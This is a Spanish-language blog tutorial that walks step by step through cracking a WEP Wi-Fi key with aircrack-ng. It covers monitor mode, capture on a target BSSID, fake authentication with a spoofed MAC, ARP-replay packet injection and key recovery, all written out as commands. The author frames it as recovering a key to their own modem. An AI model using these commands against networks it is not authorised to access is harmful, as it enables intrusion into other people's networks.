Antes que nada este tutorial lo utilice para obtener la clave de mi modem debido a que la habia extraviado y por este medio la logre encontrar.
Lo primero que hice fue bajar desde synaptic aircrack asi que lo escribi en la parte de busqueda rapida y me aparecio esto:
Lo marque para instalar y despues abri una terminal y la ejecute como super usuario escribiendo :
$ su
o bien si no funciona el comando :
$ sudo su
despues de esto escribi:
iwconfig
y me aparecio en pantalla algo como esto:
lo no wireless extensions.
eth0 no wireless extensions.
wmaster0 no wireless extensions.
wlan0 IEEE 802.11bg ESSID:"Bhome"
Mode:Managed Frequency:2.462 GHz Access Point:
Bit Rate=48 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:1234-56BE-BA
Power Management:off
Link Quality=46/70 Signal level=-64 dBm Noise level=-103 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Mode:Managed Frequency:2.462 GHz Access Point:
Bit Rate=48 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:1234-56BE-BA
Power Management:off
Link Quality=46/70 Signal level=-64 dBm Noise level=-103 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
De aqui extraje lo que mas me habia servido que fue el (wlan0) ya que este es el nombre de mi tarjeta wireless asi que mediante el siguiente comando lo que hice fue escanear las redes que habia cerca de mi casa.
- airmon-ng stop wlan0
Pero a veces ese (wlan0) cambia a (wlan1) etc es por eso que me fijo primero en el iwconfig.
Con el comando pasado lo q hice fue detener el escaneo de redes en mi maquina despues se deben de reactivas con el siguiente comando:
- airmon-ng start wlan0
En el siguente comando a mi me aparecio algo asi:
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
722 avahi-daemon
723 avahi-daemon
730 NetworkManager
753 wpa_supplicant
1869 dhclient
Process with PID 1869 (dhclient) is running on interface wlan0
722 avahi-daemon
723 avahi-daemon
730 NetworkManager
753 wpa_supplicant
1869 dhclient
Process with PID 1869 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
(monitor mode enabled on mon0)
(monitor mode enabled on mon0)
De el siguiente comando me intereso un buen la ultima parte que estaba entre parentesis esa de (mon0) ya que este es el nombreque le ha asignado el sistema a mi tarjeta.
Acto seguido lo que vamos a hacer es escanear las redes para encontrar la nuestra, el comando necesario es es siguiente.
- airodump-ng mon0
Y con este comando comenzo a escanear las redes entonces de toda la lista de redes tome la de mi casa
En donde lo que me intereso fue la parte del canal con CH y el BSSID y Probers
Entonces anote la direccion BSSID de mi casa el canal y el nombre
Entonces abri una nueva terminal e igual como superusuario le di el siguiente comando para que unicamente detecte la señal de mi casa.
airodump-ng -c 1 --bssid 00:02:CF:BB:C3:93 -w captura mon0
en donde el numero puede variar segun la direccion por ejemplo cerca de mi casa hay varias redes y cada una tiene una diferente BSSID entonces como solo quiero mantener la conexion para saber la WEP de mi casa pues le puse la direccion de la BSSID de mi casa. ademas en la parte de -c 1 es el canal si mi red estuviera en el canal 2 o 11 o 13 solamente hay que cambiar el canal escribiendo el numero correspondiente.
Despues lo que vamos a hacer es darnos de alta en el modem con una direccion MAC diferente a la nuestra, entonces abrimmos una nueva terminal sin cerrar las anteriores y como superusuario escribimos :
aireplay-ng -1 0 -e Cachisistema -a 00:02:CF:BB:C3:93 -h 11:22:33:44:55:66 mon0
En donde la parte -e ponemos el nombre de nuestra red tal cual sea, con guiones, mayusculas etc. en la parte de -a ponemos la direccion BSSID y en la parte de -h va una direccion MAC diferente a la nuestra y la mon0 la cambiamos por la que haya sido nuestra en mi caso recordemos que es mon0.
A veces al darle enter nos va a decir que no se va a poder debido a que uno se encuentra en un canal y nosotroslo enviamos a otro. lo que hice fue insertar el comando hasta que de verdad me dijera que si se pudo . una vez teniendo esto lo que vamos a hacer es inyectar paquetes en el modem para obtener un algoritomo que nos pueda dar la clave entonces metemos el siguiente codigo. En una nueva terminal sin cerrar las anteriores y como superusuario.
aireplay-ng -3 -b 00:02:CF:BB:C3:93 -h 11:22:33:44:55:66 mon0
En donde -b corresponde a la direccion BSSID la direccion -h corresponde a la mac que dimos de alta; lo que comenzara a hacer es inyectar paquetes dentro de modem y hay que esperar a que lleguemos a unos 100mil o mas para tener un algoritmo confiable, asi que por lo mientras lo que debemos de hacer es ir a comprar unas galletas, o un pambazo, o unas chascas, o sushi para esperar a llegar a los 100mil o mas.
Una vez teniendo los 100mil paquetes o mas procedemos a escribir en otra terminal como superusuario:
aircrack-ng -z *.cap
En donde el comando descifrara a traves de los paquetes inyectados la contraseña requerida. Al final nos va a aparecer algo como esto:
en donde key found es el nombre hexadecimal de la password y el ascii es el nombre tal cual. cualquier duda estoy a sus ordenes y espero que les haya servido este post hay que agradecer a pablokpo87 por haberme enseñado esto. Gracias!!!
0 comentarios:
Publicar un comentario